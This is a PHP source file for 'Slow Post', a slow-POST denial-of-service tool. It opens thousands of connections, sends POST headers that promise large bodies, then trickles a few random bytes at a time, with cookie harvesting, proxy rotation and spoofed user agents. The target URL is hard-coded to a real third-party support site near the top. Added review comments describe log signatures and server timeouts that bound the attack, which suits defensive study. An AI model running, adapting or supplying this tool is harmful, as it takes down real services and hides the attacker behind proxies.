@ 2013-05-13T06:17:18Z <?php
// Lift PHP's execution-time limit and keep running after the invoking client disconnects.
set_time_limit(0);
ignore_user_abort(true);
// NOTE(review): this overwrites argv[1] with a fixed URL, so a target passed on the command line is
// ignored and, because the URL passes NewEraUrl::isValid(), the interactive target and proxy prompts
// further down are never reached. Only argv[2] (proxy or proxy file) is still honoured.
$_SERVER['argv'][1] = 'http://support.ioncube.com/winapp/';
//-------------------------
// CONFiG
//-------------------------
// Number of cookie-harvest requests NewEraCookies makes before the POST loop starts.
$CONFIG['max_cookies'] = 20;
// Number of connection slots the main loop cycles through.
$CONFIG['max_sockets'] = 9001;
// Passed as the microseconds argument of stream_set_timeout() in openCustomSocket(),
// so despite the "_ms" suffix the value is applied as 500 microseconds.
$CONFIG['timeout_ms'] = 500;
// Pause handed to usleep() (microseconds) before each body fragment is written.
$CONFIG['usleep_time'] = 10;
//-------------------------
// INiT
//-------------------------
// Define EXPLOIT_VERSION (printed in the startup banner)
if(!defined('EXPLOIT_VERSION'))
define('EXPLOIT_VERSION', 'v1.9.2');
// Define STDIN as a fallback when the running SAPI has not defined it already
if(!defined('STDIN'))
define('STDIN', fopen('php://stdin', 'r'));
// Check SAPI: anything other than the command-line interpreter prints a message and exits with status 1
if(PHP_SAPI != 'cli') {
echo 'This script is not meant to be ran via browser.';
exit(1);
}
// Globals - DO NOT EDIT
// Filled by proxyLoadFile() with array('host' => ..., 'port' => ...) entries and read by proxyGetRandom().
$global_proxy_array = array();
//-------------------------
// FUNCTiONS FOR THE LULZ
//-------------------------
/**
 * Read one line from the STDIN stream.
 *
 * @return string|false The line with surrounding whitespace trimmed, or false when STDIN is falsy.
 */
function readSTDIN() {
    $stream = STDIN;
    if ($stream) {
        // fgets() reads up to and including the newline; trim() removes it.
        return trim(fgets($stream));
    }
    return false;
}
/**
 * Load a "host:port" list from a file and append each entry to $global_proxy_array.
 *
 * Backslashes in the path are normalised to forward slashes. When the path is empty or the
 * file cannot be read (or is empty), a message is printed and the script exits with status 1.
 * Lines without a ':' separator are skipped; the port is cast to int.
 *
 * @param string $filename Path of the proxy-list file.
 * @return void
 */
function proxyLoadFile($filename) {
    global $global_proxy_array;

    // Load proxy list file
    $filename = str_replace('\\', '/', $filename);
    $raw = @file_get_contents($filename);
    if (!$filename || !$raw) {
        echo $filename.' is not a valid proxy-list file!';
        exit(1);
    }

    // Normalise CRLF / CR line endings, then walk the file line by line
    $lines = explode("\n", str_replace(array("\r\n", "\r"), "\n", $raw));
    foreach ($lines as $line) {
        $fields = explode(':', $line);
        if (!isset($fields[0], $fields[1])) {
            continue;
        }
        $global_proxy_array[] = array(
            'host' => trim($fields[0]),
            'port' => (int)(trim($fields[1])),
        );
    }
}
/**
 * Pick one entry of $global_proxy_array at random.
 *
 * @return array|false The chosen array('host' => ..., 'port' => ...) entry, or false when the list is empty.
 */
function proxyGetRandom() {
    global $global_proxy_array;

    $total = count($global_proxy_array);
    if ($total === 0) {
        return false;
    }

    // Keep drawing until the index maps to a non-empty entry.
    do {
        $index = mt_rand(0, $total - 1);
        $picked = isset($global_proxy_array[$index]) ? $global_proxy_array[$index] : null;
    } while (!$picked);

    return $picked;
}
/**
 * Build a User-Agent string from a small fixed pool.
 *
 * The Windows NT version is one of six values; the browser is either one of four
 * Internet Explorer profiles or one of five Firefox versions, chosen with mt_rand().
 *
 * @return string The generated User-Agent value.
 */
function randomUserAgent() {
    // Microsoft Windows versions
    $windows = array('5.0', '5.1', '5.2', '6.0', '6.1', '6.2');
    $os = $windows[mt_rand(0, count($windows) - 1)];

    // Coin flip between the two browser families
    if (!mt_rand(0, 1)) {
        // Mozilla Firefox versions
        $firefox = array('17.0', '18.0', '19.0', '20.0', '21.0');
        $ff = $firefox[mt_rand(0, count($firefox) - 1)];
        return "Mozilla/5.0 (Windows NT {$os}; rv:{$ff}) Gecko/20100101 Firefox/{$ff}";
    }

    // Internet Explorer profiles: Mozilla token, MSIE version, Trident version
    $explorer = array(
        array('4.0', '7.0', '4.0'),
        array('4.0', '8.0', '4.0'),
        array('5.0', '9.0', '5.0'),
        array('5.0', '10.0', '6.0'),
    );
    $ie = $explorer[mt_rand(0, count($explorer) - 1)];
    return "Mozilla/{$ie[0]} (compatible; MSIE {$ie[1]}; Windows NT {$os}; Trident/{$ie[2]})";
}
/**
 * Opens a client socket to the target, or to the proxy when one is given, and returns it.
 *
 * @param NewEraUrl        $newEraUrl   Target; used for the connection when no proxy is supplied.
 * @param NewEraProxy|null $newEraProxy Optional proxy; when set, the socket is opened to it instead.
 * @return resource|false The stream, switched to non-blocking mode, or false when the connection failed.
 */
function openCustomSocket($newEraUrl, $newEraProxy = null) {
global $CONFIG;
// Sets PHP's default socket timeout to 1 second for the fsockopen() call below, which passes
// no timeout of its own; a failure to change the setting is suppressed.
@ini_set('default_socket_timeout', 1);
// Connect to the proxy when one was supplied, otherwise straight to the target.
$newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy);
// The transport prefix follows the chosen endpoint's own ssl flag (read through its __get()).
$host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name;
$fp = @fsockopen($host, $newEraConnection->port);
if(!$fp)
return false;
// Non-blocking mode: later fwrite() calls return immediately rather than waiting on the peer.
stream_set_blocking($fp, 0);
// NOTE(review): the third argument of stream_set_timeout() is microseconds, so the
// 'timeout_ms' setting is applied as microseconds here, not milliseconds.
stream_set_timeout($fp, 0, $CONFIG['timeout_ms']);
return $fp;
}
/**
 * Receives a socket and writes the request line and headers of a POST; no body bytes are sent here.
 * Returns the advertised Content-Length on success and false when the socket is falsy.
 *
 * Header traits visible in this function that a server log or WAF rule can key on:
 *  - the Accept value repeats the field name ("Accept: Accept: text/html,...");
 *  - Keep-Alive carries a bare integer between 60 and 120;
 *  - Content-Length is drawn from 1337..133700 while the headers arrive without any body;
 *  - Referer, when present, equals the requested URL;
 *  - User-Agent comes from the small fixed pool in randomUserAgent().
 * Servers bound this request pattern with request-body read timeouts or minimum data rates
 * (e.g. Apache mod_reqtimeout's RequestReadTimeout, nginx client_body_timeout) and with
 * per-client connection limits.
 *
 * @param resource         $sock        Stream returned by openCustomSocket().
 * @param NewEraUrl        $newEraUrl   Target URL object (path, name and full_url are read).
 * @param NewEraProxy|null $newEraProxy When truthy, the absolute URL is used in the request line.
 * @param string|false     $cookie      Cookie header value; omitted when falsy.
 * @return int|false
 */
function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie) {
// Check the socket
if(!$sock)
return false;
// Generate a random Content-Length
$length = mt_rand(1337, 133700);
// Build
// Absolute-form request target when going through a proxy, origin-form path otherwise.
$header = 'POST '.($newEraProxy ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n";
$header .= 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
// The duplicated "Accept:" token below is sent on the wire exactly as written.
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
$header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
// Referer is included on roughly half of the requests.
$header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : '';
$header .= ($cookie ? "Cookie: {$cookie}\r\n" : '');
$header .= 'Content-Length: '.$length."\r\n";
$header .= "\r\n";
// Do it
// The result of fwrite() is not checked, so $length is returned even when the write failed.
@fwrite($sock, $header);
return $length;
}
/**
 * Receives a socket and writes one small fragment of request body to it.
 *
 * @param resource $sock  Stream on which slowPostStart() already sent the headers.
 * @param int      $bytes Number of random characters to generate; non-integer values fall back to 5.
 * @return bool True after the write was attempted, false when the socket is falsy.
 */
function slowPostContinue($sock, $bytes = 5) {
global $CONFIG;
// Check the socket
if(!$sock)
return false;
// Check the $bytes
if(intval($bytes) != $bytes)
$bytes = 5;
// Throttle execution speed slightly
if($CONFIG['usleep_time'] > 0)
@usleep($CONFIG['usleep_time']);
// Do it :D
// Random printable ASCII (codes 33-126). urlencode() expands some of these characters to %XX,
// so the number of bytes written can be larger than $bytes.
$tmp = '';
for($j = 0; $j < $bytes; $j++)
$tmp .= chr(mt_rand(33, 126));
// The result of fwrite() is not checked; true is returned regardless.
@fwrite($sock, urlencode($tmp));
return true;
}
//-------------------------
// CLASSES FOR THE LULZ
//-------------------------
/**
 * Collects Cookie header values by issuing GET requests to the target before the POST loop
 * starts, and hands them out by index or at random.
 */
class NewEraCookies {
// Number of harvest requests made, and the upper bound for the random index.
private $max_cookies;
// Cookie header strings indexed 0..max_cookies-1; an entry is '' or false when nothing was obtained.
private $cookies = array();
/** Constructor: delegates to update_object() with the same arguments */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/**
 * Object updater: discards stored cookies and performs $max_cookies harvest requests.
 *
 * @param NewEraUrl        $newEraUrl   Target URL object.
 * @param NewEraProxy|null $newEraProxy Proxy object; re-pointed in place when $proxyFile is truthy.
 * @param int              $max_cookies Number of requests to make.
 * @param mixed            $proxyFile   Truthy when a proxy list is in use.
 * @param bool             $output      When true, prints a progress line with one dot per request.
 */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i = 0; $i < $this->max_cookies; $i++) {
// Using Proxy file?
if($proxyFile) {
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxyFile.' is not a valid proxy-list file!');
// Mutates the caller's proxy object, so each harvest request can leave through a different proxy.
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
if($output)
echo '.';
}
}
/**
 * Returns a cookie by its index, or a randomly chosen one when $idx is 'random'.
 * Returns '' when no entry exists at the index.
 */
public function returnCookieByIndex($idx) {
// Loose comparison: on PHP versions before 8.0 the integer 0 also compares equal to 'random'.
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies - 1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/**
 * Function to parse set-cookie from header fields
 *
 * @param array $header Response header lines.
 * @return array One entry per Set-Cookie line: 'value' => array('key' => ..., 'value' => ...)
 *               plus any of domain, expires, path, secure, comment that were present.
 */
public static function cookieParse($header) {
$cookies = array();
foreach($header as $line) {
if(preg_match('/^Set-Cookie: /i', $line)) {
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
$grabbed_cookie_data = false;
foreach($csplit as $data) {
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
// The first ';'-separated field is the cookie's own name=value pair.
if(!$grabbed_cookie_data) {
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$grabbed_cookie_data = true;
continue;
}
// Remaining fields are attributes; names are compared in lower case.
$cinfo[0] = strtolower($cinfo[0]);
// expires is converted to a Unix timestamp; secure is stored as the string 'true'.
if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) {
$cdata[$cinfo[0]] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/**
 * Function to build the request cookie header from parsed set-cookie data
 *
 * @param mixed $data Output of cookieParse().
 * @return string|false "name=value; name=value" string, or false when $data is not an array or holds no cookies.
 */
public static function cookieBuild($data) {
if(is_array($data)) {
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/**
 * Function to grab cookies from an url using PHP's fopen
 *
 * Sends one GET through the http stream wrapper and turns the Set-Cookie response headers
 * into a Cookie header value. The request carries the same header set as slowPostStart(),
 * including the duplicated "Accept: Accept:" token, so the harvest requests share that
 * log signature with the POSTs that follow.
 *
 * @param NewEraUrl        $newEraUrl   Target URL object.
 * @param NewEraProxy|null $newEraProxy Optional proxy object.
 * @return string|false '' when the request could not be opened, false when the response set no
 *                      cookies, otherwise the Cookie header value.
 */
public static function cookieGrab($newEraUrl, $newEraProxy = null) {
// Build connection header
$header = 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
// Check proxy url
if($newEraProxy) {
// Enable proxy
$proxy_url = $newEraProxy->full_url;
$request_fulluri = true;
} else {
// Disable proxy
$proxy_url = '';
$request_fulluri = false;
}
// Build stream context
// 3-second timeout, redirects not followed, and ignore_errors so the headers of error
// responses are read as well. verify_peer => false turns off TLS certificate verification
// for this request.
$context = stream_context_create(array(
'http' => array(
'method' => 'GET',
'timeout' => (3),
'header' => $header,
'proxy' => $proxy_url,
'request_fulluri' => $request_fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
'ssl' => array(
'verify_peer' => false
)
));
// Open the URL; errors are suppressed and leave $cookie as ''
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, $context);
// Only read headers when the stream opened
if($handle) {
// The response header lines are taken from the stream metadata's wrapper_data
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
// The response body is not read; the stream is closed straight away
@fclose($handle);
}
return $cookie;
}
}
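/**
 * Splits an http/https URL string into the parts the rest of the script reads
 * (full_url, protocol, ssl, name, port, path) and exposes them read-only through __get().
 */
class NewEraUrl {
    private $host_full_url;
    private $host_protocol;
    private $host_ssl;
    private $host_name;
    private $host_port;
    private $host_path;

    /**
     * Constructor.
     *
     * @param string $host_full_url URL to parse; expected to have passed isValid().
     */
    public function __construct($host_full_url) {
        $this->update_object($host_full_url);
    }

    /**
     * Re-parse the object from a new URL string.
     *
     * The port is stored as an int whether it came from the URL or from the scheme default,
     * matching NewEraProxy. A string without a "//host" part yields an empty host name
     * instead of an undefined-offset warning.
     *
     * @param string $host_full_url
     * @return void
     */
    public function update_object($host_full_url) {
        $this->host_full_url = $host_full_url;
        $this->host_ssl = (strpos((string)$host_full_url, 'https') === 0);
        $this->host_protocol = ($this->host_ssl ? 'https' : 'http');

        // "scheme:" / "" / "host[:port]" / "rest of the path and query"
        $segments = explode('/', (string)$host_full_url, 4);
        $authority = explode(':', isset($segments[2]) ? $segments[2] : '', 2);

        // Host, Port, Path
        $this->host_name = $authority[0];
        $this->host_port = isset($authority[1]) ? (int)$authority[1] : ($this->host_ssl ? 443 : 80);
        $this->host_path = '/'.(isset($segments[3]) ? $segments[3] : '');
    }

    /**
     * Getter for the private properties: $obj->name reads host_name, and so on.
     *
     * @param string $var Property name without the "host_" prefix.
     * @return mixed The property value, or null when it is unset or unknown.
     */
    public function __get($var) {
        $var = 'host_'.$var;
        if (isset($this->{$var})) {
            return $this->{$var};
        }
        return null;
    }

    /**
     * Quick check to see if url is minimally valid: it must start with "http://" or "https://".
     *
     * @param mixed $host_full_url
     * @return bool Always a boolean (the previous version fell through and returned null on failure).
     */
    public static function isValid($host_full_url) {
        $candidate = (string)$host_full_url;
        return strpos($candidate, 'https://') === 0 || strpos($candidate, 'http://') === 0;
    }
}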
/**
 * Holds a proxy endpoint parsed from a "tcp://host:port" or "ssl://host:port" string and
 * exposes full_url, protocol, ssl, name and port read-only through __get().
 */
class NewEraProxy {
    private $proxy_full_url;
    private $proxy_protocol;
    private $proxy_ssl;
    private $proxy_name;
    private $proxy_port;

    /**
     * Constructor.
     *
     * @param string $proxy_full_url Proxy endpoint string.
     */
    public function __construct($proxy_full_url) {
        $this->update_object($proxy_full_url);
    }

    /**
     * Re-parse the object from a new endpoint string.
     *
     * @param string $proxy_full_url
     * @return void
     */
    public function update_object($proxy_full_url) {
        $isSsl = (strpos($proxy_full_url, 'ssl') === 0);
        $this->proxy_full_url = $proxy_full_url;
        $this->proxy_ssl = $isSsl;
        $this->proxy_protocol = $isSsl ? 'ssl' : 'tcp';

        // Drop an optional "scheme://" prefix, then split host from port
        $schemeEnd = strpos($proxy_full_url, '://');
        $hostPort = ($schemeEnd === false) ? $proxy_full_url : substr($proxy_full_url, $schemeEnd + 3);
        $parts = explode(':', $hostPort);

        $this->proxy_name = $parts[0];
        if (isset($parts[1])) {
            $this->proxy_port = (int)$parts[1];
        } else {
            // Default port follows the transport: 443 for ssl, 80 otherwise
            $this->proxy_port = (int)($isSsl ? '443' : '80');
        }
    }

    /**
     * Getter for the private properties: $obj->name reads proxy_name, and so on.
     *
     * @param string $var Property name without the "proxy_" prefix.
     * @return mixed The property value; nothing is returned for an unknown name.
     */
    public function __get($var) {
        $property = 'proxy_'.$var;
        if (property_exists($this, $property))
            return $this->{$property};
    }
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
// Startup banner (ASCII art), followed by the EXPLOIT_VERSION constant and the author tag.
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Fetch the URL to attack
// argv[1] is accepted only when it starts with http:// or https:// (NewEraUrl::isValid).
$url = null;
if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]))
$url = $_SERVER['argv'][1];
// Fetch proxy to use
// argv[2] is read either as "host:port" or, failing that, as the path of a readable proxy-list file.
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if(!empty($url) && isset($_SERVER['argv'][2])) {
// explode() replaces the $proxy array built above, so its 'host', 'port' and 'file' keys
// exist afterwards only if one of the branches below sets them again.
if($proxy = explode(':', $_SERVER['argv'][2])) {
if(isset($proxy[0], $proxy[1])) {
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = (int)($proxy[1]);
unset($proxy[0], $proxy[1]);
}
}
if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) {
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Ask for proxy
// Interactive path: entered only when no valid URL came from argv and no proxy was configured.
if(empty($url) && (empty($proxy['host']) || empty($proxy['port'])) && !$proxy['file']) {
$proxy['use'] = null;
while(!$proxy['use']) {
echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: ';
$proxy['use'] = readSTDIN();
// Only the first letter of the answer is examined (n / y / f, case-insensitive).
if(strpos(strtolower($proxy['use']), 'n') === 0) {
break;
} elseif(strpos(strtolower($proxy['use']), 'y') === 0) {
echo PHP_EOL.'Proxy IP: ';
$proxy['host'] = readSTDIN();
echo PHP_EOL.'Proxy Port: ';
$proxy['port'] = (int)(readSTDIN());
} elseif(strpos(strtolower($proxy['use']), 'f') === 0) {
echo PHP_EOL.'Proxy file: ';
$proxy['filename'] = readSTDIN();
if(is_readable($proxy['filename'])) {
$proxy['file'] = true;
} else {
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$proxy['use'] = null;
}
} else {
$proxy['use'] = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
}
}
unset($proxy['use']);
}
// Ask for target URL
// Repeats the prompt until the input passes NewEraUrl::isValid().
while(!$url) {
echo PHP_EOL.'Target url: ';
$url = readSTDIN();
if(NewEraUrl::isValid($url)) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy support
// No fixed host/port: either no proxy at all, or a first random entry from the proxy-list file.
if(empty($proxy['host']) || empty($proxy['port'])) {
$newEraProxy = null;
if(!empty($proxy['file'])) {
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
} else {
$newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']);
}
// Init the others
// Constructing NewEraCookies performs max_cookies GET requests against the target right away.
$newEraUrl = new NewEraUrl($url);
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], $proxy['file'], true);
// Start
// Main loop; it has no exit condition other than the proxy-list failure below. For each of
// the max_sockets slots it opens a fresh connection, sends POST headers via slowPostStart(),
// and stores the socket together with the number of body bytes still owed. After every
// connection attempt it writes at most 5 more body characters to each stored socket and
// closes those whose advertised length has been used up.
// Seen from the server: many simultaneous connections from one source (or from the listed
// proxies), each holding a POST whose body arrives a few bytes at a time. Per-client
// connection limits and request-body read timeouts or minimum-rate rules are the controls
// that bound this behaviour.
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
// Slot index => array('sock' => stream, 'length' => body bytes still to send)
$fp = array();
// Do it
while(1) {
for($i = 0; $i < $CONFIG['max_sockets']; $i++) {
// Using Proxy file?
if($proxy['file']) {
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
// Re-point the shared proxy object at a different list entry for this connection
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket
$tmp = array();
if($tmp['sock'] = openCustomSocket($newEraUrl, $newEraProxy)) {
// Progress bar
echo '.';
// Start a new slowPost and find its length
if($tmp['length'] = slowPostStart($tmp['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) {
if(isset($fp[$i], $fp[$i]['sock'])) {
// Close connection in the global socket array if it is being used
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
// Save the new socket in the global socket array
$fp[$i] = $tmp;
} else {
// slowPostStart() returned false: drop the socket that was just opened
@fclose($tmp['sock']);
}
}
unset($tmp);
// Check the current sockets
foreach($fp as $k => $v) {
if($fp[$k]['length'] > 0) {
// Continue old slowPosts
// At most 5 characters per pass; 'length' counts generated characters, not the
// url-encoded bytes that slowPostContinue() actually writes.
$tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5;
slowPostContinue($fp[$k]['sock'], $tmp);
$fp[$k]['length'] -= $tmp;
} else {
// Close completed slowPosts
@fclose($fp[$k]['sock']);
unset($fp[$k]);
}
}
}
}
?>